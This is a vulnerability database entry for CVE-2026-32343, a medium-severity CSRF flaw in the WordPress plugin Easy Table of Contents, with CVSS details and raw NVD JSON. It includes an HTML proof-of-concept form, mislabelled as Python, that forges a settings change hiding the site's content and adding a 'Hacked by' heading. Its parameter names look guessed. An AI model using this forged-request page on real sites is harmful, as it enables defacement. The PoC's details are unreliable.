Security Vulnerability Report
中文
CVE-2026-32343 CVSS 4.3 MEDIUM

CVE-2026-32343

Published: 2026-03-13 19:54:46
Last Modified: 2026-04-22 21:30:26

Description

Cross-Site Request Forgery (CSRF) vulnerability in Magazine3 Easy Table of Contents easy-table-of-contents allows Cross Site Request Forgery.This issue affects Easy Table of Contents: from n/a through <= 2.0.80.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Easy Table of Contents <= 2.0.80

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- CSRF PoC for CVE-2026-32343 --> <!-- This PoC demonstrates how an attacker can induce a logged-in admin to modify plugin settings --> <!DOCTYPE html> <html> <head> <title>CSRF PoC - Easy Table of Contents</title> </head> <body> <h1>CSRF PoC for CVE-2026-32343</h1> <p>Click the button below to trigger the CSRF attack.</p> <!-- Form to modify plugin settings --> <form action="http://target-site/wp-admin/admin-post.php" method="POST" id="csrfForm"> <input type="hidden" name="action" value="eztoc_save_settings"> <input type="hidden" name="eztoc_options[enable_toc]" value="1"> <input type="hidden" name="eztoc_options[show_headings]" value="1"> <input type="hidden" name="eztoc_options[custom_css]" value="body { display: none; }"> <input type="hidden" name="eztoc_options[heading_text]" value="Hacked by CVE-2026-32343"> <input type="hidden" name="nonce" value="ATTACKER_CONTROLLED_OR_EMPTY"> </form> <button type="submit" onclick="this.innerHTML='Attack Sent!'; return false;">Click to Execute CSRF</button> <script> // Auto-submit form after page load // window.onload = function() { document.getElementById('csrfForm').submit(); }; </script> <!-- Alternative: Image-based trigger (no user interaction) --> <!-- <img src="http://target-site/wp-admin/admin-post.php?action=eztoc_save_settings&eztoc_options[enable_toc]=0" style="display:none"> --> </body> </html>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-32343", "sourceIdentifier": "[email protected]", "published": "2026-03-13T19:54:45.517", "lastModified": "2026-04-22T21:30:26.497", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Cross-Site Request Forgery (CSRF) vulnerability in Magazine3 Easy Table of Contents easy-table-of-contents allows Cross Site Request Forgery.This issue affects Easy Table of Contents: from n/a through <= 2.0.80."}, {"lang": "es", "value": "Vulnerabilidad de falsificación de petición en sitios cruzados (CSRF) en Magazine3 Easy Table of Contents easy-table-of-contents permite la falsificación de petición en sitios cruzados. Este problema afecta a Easy Table of Contents: desde n/a hasta &lt;= 2.0.80."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-352"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/easy-table-of-contents/vulnerability/wordpress-easy-table-of-contents-plugin-2-0-80-cross-site-request-forgery-csrf-vulnerability?_s_id=cve", "source": "[email protected]"}]}}